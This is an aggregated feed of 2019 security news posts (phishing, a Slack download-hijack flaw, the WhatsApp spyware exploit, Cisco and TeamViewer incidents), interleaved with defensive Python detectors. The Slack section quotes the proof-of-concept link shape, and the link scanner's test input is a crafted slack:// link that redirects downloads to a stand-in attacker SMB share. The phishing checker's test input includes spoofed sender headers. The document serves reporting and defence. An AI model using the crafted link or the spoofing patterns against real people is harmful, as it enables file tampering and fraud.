Once email and the rest of the Internet became a public sphere rather than a government-funded research network, opportunists found a new home in exploiting its weaknesses at the expense of unsuspecting users. The number of cyber attacks targeting countries and companies keeps increasing, and information security is now a matter of survival for companies. At the same time, business has become inseparable from IT: numerous IT investments are required, but security budgets remain limited. Likewise, many IT staff are busy with a wide range of tasks, which makes it difficult for them to specialize in security.

Under such circumstances, effective use of security solutions is essential to maintain a safe environment that also covers business partners and customers. Above all, the most important question is how to secure email, which is commonly said to account for 80 to 90% of attack paths. It goes without saying that of all the damage caused by cyber attacks, it is information leakage that does the most lasting harm to companies. Targeted attack emails and phishing emails often spoof legitimate senders such as business partners, financial institutions and public organizations. And the reason the damage has kept growing worldwide over the last two decades is that both the lures in such emails and the malware they carry have been steadily refined.

Is there a permanent solution?
Email-based attacks most often use malware attachments, such as ransomware, or URL spoofing (redirection). In the latter case, clicking the link in the email diverts you to a forged website, which then pushes malware onto your machine. Be aware, too, that in such email-based attacks the pattern of spam emails, previously thought to cause no direct harm to systems, is being used more and more.

Spam is advertising email sent indiscriminately to an unspecified number of recipients. In the past, the damage caused by spam was that large volumes of unwanted mail interfered with business operations and the effort of deleting it was a constant cost. More recently, as noted above, spam has also become a trigger for malware infection and a vehicle for phishing scams. Botnets that send large-scale spam campaigns are increasingly the delivery channel for ransomware as well.

Technical controls help, but there is no substitute for users developing a healthy sense of doubt when they receive email. A reasonable level of suspicion does not hurt; it is even safer to call the purported sender to verify that they actually sent the message. No system can prevent email risks 100%, but there will always be a human standing in the way. The point at which a network gets infected or a company falls for spear phishing is the human user of the system. All employees are the front line of corporate IT security.
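The spoofing the article describes usually leaves traces in the headers before a human ever has to pick up the phone: a display name that carries a trusted address, a Reply-To that quietly diverts the reply, or a sender domain that only looks like the partner’s. The following is an added example, not code from the article’s author or from any mail product. It assumes a small allow-list of domains the company corresponds with (TRUSTED_DOMAINS) and uses three constructed messages; the lookalike folding is deliberately crude and is meant as a triage check, not a replacement for SPF, DKIM and DMARC.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Assumed allow-list of domains the company actually corresponds with.
TRUSTED_DOMAINS = {"bank.example", "partner.example"}

# Crude confusable folding: "rn" reads as "m", "vv" as "w", digits as letters.
_DIGITS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})

def fold_lookalikes(domain: str) -> str:
    return domain.lower().replace("rn", "m").replace("vv", "w").translate(_DIGITS)

def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def check_sender(raw: str) -> list:
    """Flag the sender-spoofing patterns common in phishing: a display name that
    smuggles a trusted address, a Reply-To that diverts replies elsewhere, and
    a From domain that merely resembles a trusted one. Returns a list of findings."""
    msg = message_from_string(raw, policy=policy.default)
    name, addr = parseaddr(str(msg.get("From", "")))
    from_dom = domain_of(addr)
    findings = []

    # 1. Display name contains an address whose domain is not the real sender domain.
    smuggled = re.search(r"[\w.+-]+@([\w.-]+)", name)
    if smuggled and smuggled.group(1).lower() != from_dom:
        findings.append(f"display name claims {smuggled.group(1)} but address is {addr}")

    # 2. Replies would go somewhere other than the apparent sender.
    _, reply = parseaddr(str(msg.get("Reply-To", "")))
    if reply and domain_of(reply) != from_dom:
        findings.append(f"Reply-To {reply} diverts replies away from {from_dom}")

    # 3. Sender domain is a lookalike or a fake subdomain of a trusted domain.
    if from_dom not in TRUSTED_DOMAINS:
        for trusted in TRUSTED_DOMAINS:
            if fold_lookalikes(from_dom) == fold_lookalikes(trusted) or from_dom.startswith(trusted + "."):
                findings.append(f"{from_dom} is a lookalike of trusted domain {trusted}")
    return findings

# Constructed sample messages.
LEGIT = "From: Alice <alice@bank.example>\nTo: cfo@corp.example\nSubject: Q2 statement\n\nAttached.\n"
LOOKALIKE = ("From: Accounts Payable <pay@bank.exarnple>\nReply-To: collect@mailbox.example\n"
             "To: cfo@corp.example\nSubject: Invoice overdue\n\nPay today.\n")
SMUGGLED = ('From: "ceo@bank.example" <random123@freemail.example>\nTo: cfo@corp.example\n'
            "Subject: urgent wire\n\nCall me.\n")

if __name__ == "__main__":
    for label, raw in (("legit", LEGIT), ("lookalike", LOOKALIKE), ("smuggled", SMUGGLED)):
        print(label, check_sender(raw) or "no findings")
```

A message that trips any of these checks is a good candidate for the out-of-band phone call the article recommends; a message that passes them is not thereby safe, which is why the human remains the last line.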

Also, Read:

Avoid These Mistakes, Ensure Better Enterprise Security

Is It Possible To Have Email Security Without OpenPGP/S-MIME?

Mimecast Quarterly Report: 25% Of Spam and Malicious Emails Bypass Security Systems

How Enterprises Can Combat Cybersecurity Challenges On The Cloud

Can Artificial Intelligence Boost Future Email Security?


Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Related: WhatsApp spyware attack was attempt to hack human rights data, says lawyer

Related: WhatsApp hack: have I been affected and what should I do?


Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

According to the newspaper, Chinese state-sponsored hackers used the Winnti trojan to infect the company’s systems.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially motivated but has also run cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry, and the majority of their victims are located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted in autumn 2016, when its experts detected suspicious activity and quickly blocked it to prevent major damage.

A TeamViewer spokesperson said the company investigated the intrusion attempt but found no evidence that customer data or other sensitive data had been exposed.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

Earlier that year, in May 2016, the company had published a statement denying a breach after reports of hijacked accounts:

“Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.



Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services.

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that it is possible to use slack:// links to change Slack app settings when clicked, including the PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that, when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”


Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

For example, an attacker could tamper with an Office document the victim downloaded, turning it into a malware carrier.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But is it possible to deliver the link to Slack channels the attacker is not a member of?

The expert discovered that an unauthenticated attacker can change the location of downloaded files via RSS feeds: Slack channels can subscribe to RSS feeds to populate a channel with site updates, and those updates can contain links.

In this case the attacker has to trick the victim into clicking a specially crafted link delivered through an RSS feed the channel subscribes to. The download location can be changed even if the attacker has no access to the victim’s Slack workspace.
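Because the malicious link has a fixed shape (a slack://settings/ URL whose update parameter sets PrefSSBFileDownloadPath), it can be spotted in message bodies and in RSS items before anyone clicks it. The following is an added example, not code from Tenable, David Wells or Slack: it parses such links, distinguishes a plain download-path change from one pointing at a UNC share, and scans free text for slack:// links. The single-quoted, unescaped-backslash syntax is taken from the proof-of-concept link quoted above; the normalisation to strict JSON is an assumption about how that text should be read, and the classification labels are this example’s own.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# The page names one preference an attacker profits from; add others here if needed.
SENSITIVE_PREFS = {"PrefSSBFileDownloadPath"}
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")     # \\host\share or //host/share
LINK_RE = re.compile(r'slack://[^\s<>"]+', re.I)

def parse_settings_update(link: str):
    """Return the settings dict carried by slack://settings/?update=..., else None."""
    parts = urlsplit(link)
    if parts.scheme.lower() != "slack" or parts.netloc.lower() != "settings":
        return None
    values = parse_qs(parts.query).get("update")
    if not values:
        return None
    # The PoC uses single quotes and raw backslashes; normalise to strict JSON (assumption).
    text = values[0].replace("\\", "\\\\").replace("'", '"')
    try:
        update = json.loads(text)
    except json.JSONDecodeError:
        return None
    return update if isinstance(update, dict) else None

def classify_link(link: str) -> str:
    """'benign' for anything that is not a settings link, 'settings-change' for other
    preferences, 'download-path-change' for a local path, 'download-hijack-smb' for a share."""
    update = parse_settings_update(link)
    if update is None:
        return "benign"
    for pref, value in update.items():
        if pref in SENSITIVE_PREFS and isinstance(value, str):
            return "download-hijack-smb" if UNC_RE.match(value) else "download-path-change"
    return "settings-change"

def scan_text(text: str):
    """Classify every slack:// link found in a message body or feed item."""
    return [(link, classify_link(link)) for link in LINK_RE.findall(text)]

if __name__ == "__main__":
    # Constructed feed item carrying the PoC-shaped link with an attacker-controlled share.
    item = r"Release notes: slack://settings/?update={'PrefSSBFileDownloadPath':'\\attacker.example\share'} (read more)"
    for link, verdict in scan_text(item):
        print(verdict, link)
```

Note the limits: an http link that redirects to a slack:// URL, which is how Wells posted it on Reddit, is only caught after the redirect is followed, so this belongs in whatever expands URLs before they reach the channel, and the real fix remains updating the client.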

“Let’s consider an example with, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to,”

The flaw was classified as “medium severity” because it requires user interaction. Slack awarded the researcher $500 under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.

How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability

A new WhatsApp vulnerability has attracted the attention of the press and security professionals around the world. We wanted to provide some information and a quick summary.

This post will cover vulnerability analysis and how McAfee MVISION Mobile can help.


On May 13th, Facebook announced a vulnerability associated with all of its WhatsApp products. This vulnerability was reportedly exploited in the wild, and it was designated as CVE-2019-3568.

WhatsApp told the BBC its security team was the first to identify the flaw. It shared that information with human rights groups, selected security vendors and the US Department of Justice earlier this month.

The CVE-2019-3568 Vulnerability Explained

WhatsApp suffers from a buffer overflow weakness, meaning an attacker can leverage it to run malicious code on the device. Data packets can be manipulated during the start of a voice call, leading to the overflow being triggered and the attacker commandeering the application. Attackers can then deploy surveillance tools to the device to use against the target.

A buffer overflow vulnerability in WhatsApp VOIP (voice over internet protocol) stack allows remote code execution via a specially-crafted series of SRTP (secure real-time transport protocol) packets sent to a target phone number.

Affected Versions:

  • WhatsApp for Android prior to v2.19.134
  • WhatsApp Business for Android prior to v2.19.44
  • WhatsApp for iOS prior to v2.19.51
  • WhatsApp Business for iOS prior to v2.19.51
  • WhatsApp for Windows Phone prior to v2.18.348
  • WhatsApp for Tizen prior to v2.18.15.
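Checking a fleet against this list is a version comparison, and the common mistake is comparing version strings lexically (“2.19.99” sorts after “2.19.134” as text). The following is an added example, not code from McAfee or from WhatsApp: it encodes the fixed versions listed above, compares numerically, and runs over a constructed device inventory of the kind an MDM export would produce (the row layout is an assumption).

```python
# First fixed version per (platform, app), from the affected-version list above.
FIXED_VERSIONS = {
    ("android", "WhatsApp"): "2.19.134",
    ("android", "WhatsApp Business"): "2.19.44",
    ("ios", "WhatsApp"): "2.19.51",
    ("ios", "WhatsApp Business"): "2.19.51",
    ("windows phone", "WhatsApp"): "2.18.348",
    ("tizen", "WhatsApp"): "2.18.15",
}

def version_tuple(version: str) -> tuple:
    """'2.19.134' -> (2, 19, 134); a build suffix such as '-beta' is ignored."""
    core = version.split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))

def is_vulnerable(platform: str, app: str, version: str):
    """True if the installed version predates the fix, False if patched,
    None if the platform/app pair is not covered by the advisory."""
    fixed = FIXED_VERSIONS.get((platform.lower(), app))
    if fixed is None:
        return None
    return version_tuple(version) < version_tuple(fixed)

# Constructed inventory rows; an MDM export would look roughly like this (assumed layout).
INVENTORY = [
    {"device": "d1", "os": "Android", "app": "WhatsApp", "version": "2.19.99"},
    {"device": "d2", "os": "Android", "app": "WhatsApp", "version": "2.19.134"},
    {"device": "d3", "os": "iOS", "app": "WhatsApp Business", "version": "2.19.50"},
    {"device": "d4", "os": "iOS", "app": "WhatsApp", "version": "2.19.51"},
    {"device": "d5", "os": "Android", "app": "Signal", "version": "4.40.0"},
]

def exposed_devices(inventory) -> list:
    """Device ids still running a version before the fix for CVE-2019-3568."""
    return [row["device"] for row in inventory
            if is_vulnerable(row["os"], row["app"], row["version"])]

if __name__ == "__main__":
    print("exposed:", exposed_devices(INVENTORY))
```

The same comparison is what a policy engine needs to quarantine or prompt the affected devices; a string comparison would wrongly report d1 as patched.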

The Alleged Exploit

An exploit of the vulnerability was used in an attempted attack on the phone of a UK-based attorney on 12 May, the Financial Times reported. The reported attack involved using WhatsApp’s voice calling function to ring a target’s device. Even if the call was not picked up, the surveillance software could be installed.

How MVISION Mobile can combat CVE-2019-3568 Attacks

To date, the detection technology inside MVISION Mobile has detected 100 percent of zero-day device exploits without requiring an update.

MVISION Mobile helps protect customers by identifying at-risk iOS and Android devices and active threats trying to leverage the vulnerability. It leverages Advanced App Analysis capabilities to help administrators find all devices that are exposed to the WhatsApp vulnerability by identifying all devices that have the vulnerable versions of WhatsApp on them and establish custom policies to address the risk. If the exploit attempts to elevate privileges and compromise the device, MVISION Mobile would detect the attack on the device.

For more information about MVISION Mobile, download our datasheet or visit our web site.

The post How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability appeared first on McAfee Blogs.

New research: How effective is basic account hygiene at preventing hijacking

Every day, we protect users from hundreds of thousands of account hijacking attempts. Most attacks stem from automated bots with access to third-party password breaches, but we also see phishing and targeted attacks. Earlier this year, we suggested how just five simple steps like adding a recovery phone number can help keep you safe, but we wanted to prove it in practice.
We teamed up with researchers from New York University and the University of California, San Diego to find out just how effective basic account hygiene is at preventing hijacking. The year-long study, on wide-scale attacks and targeted attacks, was presented on Wednesday at a gathering of experts, policy makers, and users called The Web Conference.
Our research shows that simply adding a recovery phone number to your Google Account can block up to 100% of automated bots, 99% of bulk phishing attacks, and 66% of targeted attacks that occurred during our investigation.

Google’s automatic, proactive hijacking protection
We provide an automatic, proactive layer of security to better protect all our users against account hijacking. Here’s how it works: if we detect a suspicious sign-in attempt (say, from a new location or device), we’ll ask for additional proof that it’s really you. This proof might be confirming you have access to a trusted phone or answering a question where only you know the correct response.
If you’ve signed into your phone or set up a recovery phone number, we can provide a similar level of protection to 2-Step Verification via device-based challenges. We found that an SMS code sent to a recovery phone number helped block 100% of automated bots, 96% of bulk phishing attacks, and 76% of targeted attacks. On-device prompts, a more secure replacement for SMS, helped prevent 100% of automated bots, 99% of bulk phishing attacks and 90% of targeted attacks.

Both device- and knowledge-based challenges help thwart automated bots, while device-based challenges help thwart phishing and even targeted attacks.

If you don’t have a recovery phone number established, then we might fall back on the weaker knowledge-based challenges, like recalling your last sign-in location. This is an effective defense against bots, but protection rates for phishing can drop to as low as 10%. The same vulnerability exists for targeted attacks. That’s because phishing pages and targeted attackers can trick you into revealing any additional identifying information we might ask for.
Given the security benefits of challenges, one might ask why we don’t require them for all sign-ins. The answer is that challenges introduce additional friction and increase the risk of account lockout. In an experiment, 38% of users did not have access to their phone when challenged. Another 34% of users could not recall their secondary email address.
If you lose access to your phone, or can’t solve a challenge, you can always return to a trusted device you previously logged in from to gain access to your account.

Digging into “hack for hire” attacks
Where most bots and phishing attacks are blocked by our automatic protections, targeted attacks are more pernicious. As part of our ongoing efforts to monitor hijacking threats, we have been investigating emerging “hack for hire” criminal groups that purport to break into a single account for a fee on the order of $750 USD. These attackers often rely on spear phishing emails that impersonate family members, colleagues, government officials, or even Google. If the target doesn’t fall for the first spear phishing attempt, follow-on attacks persist for upwards of a month.

Example man-in-the-middle phishing attack that checks for password validity in real-time. Afterwards, the page prompts victims to disclose SMS authentication codes to access the victim’s account.

We estimate just one in a million users face this level of risk. Attackers don’t target random individuals though. While the research shows that our automatic protections can help delay, and even prevent as many as 66% of the targeted attacks that we studied, we still recommend that high-risk users enroll in our Advanced Protection Program. In fact, zero users that exclusively use security keys fell victim to targeted phishing during our investigation.

Take a moment to help keep your account secure
Just like buckling a seat belt, take a moment to follow our five tips to help keep your account secure. As our research shows, one of the easiest things you can do to protect your Google Account is to set up a recovery phone number. For high-risk users—like journalists, activists, business leaders, and political campaign teams—our Advanced Protection Program provides the highest level of security. You can also help protect your non-Google accounts from third-party password breaches by installing the Password Checkup Chrome extension.

1 Minute Quick Privacy Ref-ernces

If you have a moment, take a look at our 1 minute videos to get caught up on the latest things going on in the privacy community. California Consumer Protection Act – Ben Siegel discusses the California Consumer Protection Act and how some of the advancing Amendments can drastically change the CCPA. Privacy Awareness Ideas […]

The post 1 Minute Quick Privacy Ref-ernces appeared first on Privacy Ref Blog.

Cisco AMP for Endpoints excelling in AV Comparatives Business Main Test Series

AV-Comparatives has long been the benchmark for third-party testing in the endpoint security space. This year, for the first time ever, AMP for Endpoints participated in AV-Comparatives malware testing. The Business Main Test Series was broken up into two main sections: the Malware Protection Test and the Business Real-World Protection Test.

While the full report will be released in July, AV-Comparatives released a short fact sheet today. Because the test is only partially completed, the results will continue to vary, but Cisco AMP for Endpoints expects to maintain consistently high scores.


First, let’s give the brief facts behind the Business Main Test Series:

  • 19 products are participating
  • All products tested on a Windows 10 RS5 64-bit
  • All vendors were allowed to configure their products
  • Cloud and PUA detection activated in all products

Given these parameters, the 19 products will participate in a four-month test culminating in July. At this midpoint, however, the products have participated in the two aforementioned tests.

For more information on specific configurations and a list of all participants, read the full fact sheet here.

Malware Protection Test 

In this test, the products were tested with 1,311 different malware samples. Based on criteria defined by AV-Comparatives in their report, the products were given parameters to detect the malware samples.

So far, AMP for Endpoints is one of eight products to have a malware protection rate of 99.8% or higher. In addition to this extremely high detection rate, AMP for Endpoints registered 0 false alarms on common business software.

AV-Comparatives also performed tests on non-business software. This will not affect the final “Approved Business Product” rating they deliver, but the results are notable because they help to demonstrate how well a product can really delineate between good and bad. Cisco AMP for Endpoints was granted the highest rating of “very low”, which denotes 0-5 false positives on non-business software.

Cisco AMP for Endpoints consistently pledges to deliver elite threat detection, investigation, and response. The 99.8% malware protection rate so far highlights Cisco AMP for Endpoints’ ability to deliver on that pledge. At the same time, the low number of false positives shows that Cisco AMP for Endpoints does not need to bog down IT professionals with useless alerts, allowing them to focus on what’s really important.

Real-World Protection Test

Over the course of two months, the products encountered 389 test cases. Of those 389 test cases, Cisco AMP for Endpoints has blocked all but three while producing zero false alarms, resulting in a 99.2% protection rate so far. Cisco AMP for Endpoints is one of only three products to have zero false alarms; others have already flagged up to 18 false alarms.


It is important to note that this test has not concluded. We are, however, very excited for a continued strong showing from Cisco AMP for Endpoints in the second half of the test. So far, Cisco AMP for Endpoints has already shown an elite combination of threat detection, investigation, and response combined with low false positives designed to empower IT professionals to quickly identify and respond to threats.

For more on the report, click here.

To try AMP for Endpoints for free, sign up for the free trial.

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware

WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and redesigned to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently. Hackers have been seen injecting payment-stealing malware into several large online retailers’ websites since the beginning of the year.
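The check a site owner can apply to a third-party script like the seal described above is Subresource Integrity (SRI): the page pins the script to a hash of the bytes that were reviewed, and the browser refuses to run a fetched copy that no longer matches. The following is an added example, not code from Webroot or Best of the Web; the seal URL and script contents are constructed placeholders. It produces the `integrity` value and applies the browser's matching rule (only the hashes using the strongest listed algorithm count).

```python
"""Subresource Integrity for a third-party script: an added example, not
vendor code. SEAL_URL and SEAL_SCRIPT are constructed placeholders.
"""
import base64
import hashlib

# Algorithms SRI recognises, ordered by strength (browsers ignore anything else).
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Integrity token for the exact bytes the script is expected to have."""
    if algo not in STRENGTH:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content: bytes, integrity: str) -> bool:
    """True if content matches a hash of the strongest algorithm listed in
    `integrity`. An attribute with no recognised hashes returns False here;
    browsers instead load such a resource unchecked, so keep the attribute
    well formed."""
    tokens = [t for t in integrity.split() if t.partition("-")[0] in STRENGTH]
    if not tokens:
        return False
    strongest = max(STRENGTH[t.partition("-")[0]] for t in tokens)
    return any(sri_hash(content, t.partition("-")[0]) == t
               for t in tokens if STRENGTH[t.partition("-")[0]] == strongest)


def script_tag(src: str, content: bytes) -> str:
    """<script> tag that pins the third-party script to the reviewed bytes."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


# Constructed sample: the seal script as reviewed, and a copy with one change.
SEAL_URL = "https://seal.example/badge.js"     # placeholder, not the vendor's URL
SEAL_SCRIPT = (b"(function(){var i=document.createElement('img');"
               b"i.src='https://seal.example/badge.png';"
               b"document.body.appendChild(i);})();")
TAMPERED_SCRIPT = SEAL_SCRIPT.replace(b"badge.png", b"badge.png?v=2")


if __name__ == "__main__":
    pinned = sri_hash(SEAL_SCRIPT)
    print(script_tag(SEAL_URL, SEAL_SCRIPT))
    print("reviewed copy loads:", sri_matches(SEAL_SCRIPT, pinned))     # True
    print("tampered copy loads:", sri_matches(TAMPERED_SCRIPT, pinned))  # False
```

The caveat is that SRI only works for a script whose bytes are fixed: if the seal vendor legitimately updates the script, the pinned page stops loading it until the hash is refreshed. Sites that cannot accept that usually self-host a reviewed copy instead, which removes the vendor's CDN from the trust chain entirely.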

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Cisco addressed a critical flaw in networks management tool Prime Infrastructure

Cisco has issued security updates to address 57 security flaws, including three flaws in the network management tool Prime Infrastructure.

One of the flaws addressed by Cisco in the Prime Infrastructure management tool could be exploited by an unauthenticated attacker to execute arbitrary code with root privileges on PI devices.

“Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.” reads the advisory published by Cisco.

“One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.”

The remaining two issues, tracked as CVE-2019-1822 and CVE-2019-1823, could be exploited by an attacker that has valid credentials to authenticate to the impacted administrative interface.

The flaws affect Cisco Prime Infrastructure Software releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

The vulnerabilities were discovered by Steven Seeley of Source Incite.

“These vulnerabilities exist because the software improperly validates user-supplied input,” continues the advisory. “An attacker could exploit these vulnerabilities by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.”

Cisco PSIRT experts are not aware of any attacks exploiting the flaws in the wild.
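The advisory attributes the flaws to improper validation of user-supplied input on a file upload. As an added example of the controls such an upload path normally needs (not Cisco's code, and not a description of the Prime Infrastructure bug itself; the allowlist, size limit and upload directory are assumptions for this example): the client-supplied name is reduced to a bare file name, checked against a conservative pattern and an extension allowlist, the content is checked against the signature expected for that type, the stored name is chosen by the server, and the final path is re-checked against the upload root before anything is written.

```python
"""Hardened handling of an uploaded file: an added example of the input
validation the advisory says was missing. Not Cisco's code; the allowed
types, size limit and upload root are assumptions for this example.
"""
import os
import posixpath
import re
import secrets

# Assumed policy: only the types the application actually needs, each with the
# leading bytes a genuine file of that type must carry (None = text, no signature).
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF-",
    ".csv": None,
}
MAX_BYTES = 5 * 1024 * 1024
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


def check_upload(client_name, content, max_bytes=MAX_BYTES):
    """Return None when the upload is acceptable, else the reason it is rejected."""
    # Accept only a bare file name: any directory part (either separator) is rejected.
    base = posixpath.basename(client_name.replace("\\", "/"))
    if base != client_name or base in ("", ".", ".."):
        return "path component in file name"
    if not SAFE_NAME.match(base):
        return "file name contains disallowed characters"
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return f"extension {ext or '(none)'} not allowed"
    if len(content) > max_bytes:
        return "file too large"
    signature = ALLOWED_TYPES[ext]
    if signature is not None and not content.startswith(signature):
        return "content does not match declared type"
    if signature is None and b"\x00" in content:
        return "binary content in a text upload"
    return None


def stored_name_for(client_name):
    """Server-chosen name; the random prefix stops uploads overwriting each other."""
    return f"{secrets.token_hex(8)}-{client_name}"


def resolve_under_root(upload_root, name):
    """Absolute destination path, or None if it would escape the upload root."""
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, dest]) != root:
        return None
    return dest


def store_upload(upload_root, client_name, content):
    """Validate, then write with owner-only permissions. Raises ValueError on rejection."""
    reason = check_upload(client_name, content)
    if reason is not None:
        raise ValueError(f"upload rejected: {reason}")
    dest = resolve_under_root(upload_root, stored_name_for(client_name))
    if dest is None:
        raise ValueError("upload rejected: resolved path escapes upload root")
    # upload_root is assumed to sit outside any web-served directory; O_EXCL
    # refuses to follow a pre-existing file or symlink at the destination.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return dest


if __name__ == "__main__":
    print(check_upload("report.csv", b"id,name\n1,alice\n"))          # None
    print(check_upload("../../etc/cron.d/job", b"x"))                 # path component in file name
    print(check_upload("page.jsp", b"<%= 1 %>"))                      # extension .jsp not allowed
```

The extension allowlist on its own is not enough: the signature check stops a file that merely carries a permitted name, and the server-side path resolution catches anything the earlier string checks missed, so the write never depends on a single filter being right.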

A few days ago, Cisco fixed the Thrangrycat, a vulnerability tracked as CVE-2019-1649 that affects multiple Cisco products supporting the Trust Anchor module (TAm). The issue could be exploited by an attacker to fully bypass Cisco’s Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation.

Pierluigi Paganini

(SecurityAffairs – Cisco Prime infrastructure, hacking)

The post Cisco addressed a critical flaw in networks management tool Prime Infrastructure appeared first on Security Affairs.

This Week in Security News: Unsecured Servers and Vulnerable Processors


